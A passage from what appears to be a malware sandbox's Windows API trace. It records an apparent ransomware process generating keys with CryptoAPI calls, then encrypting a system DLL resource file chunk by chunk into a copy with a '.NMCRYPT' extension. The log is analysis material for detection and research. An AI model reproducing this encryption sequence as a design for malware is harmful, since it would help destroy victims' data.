| out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.401] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.402] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.402] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0169.402] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.402] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad338) returned 1 [0169.402] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0169.402] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0169.402] wcslen (_String="\\\\?\\") returned 0x4 [0169.402] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad138) returned 1 [0169.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.403] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0169.403] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0169.404] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.406] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.406] GetLastError () returned 0x0 [0169.406] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.453] GetLastError () returned 0x0 [0169.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.454] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.454] GetLastError () returned 0x0 [0169.454] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.454] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 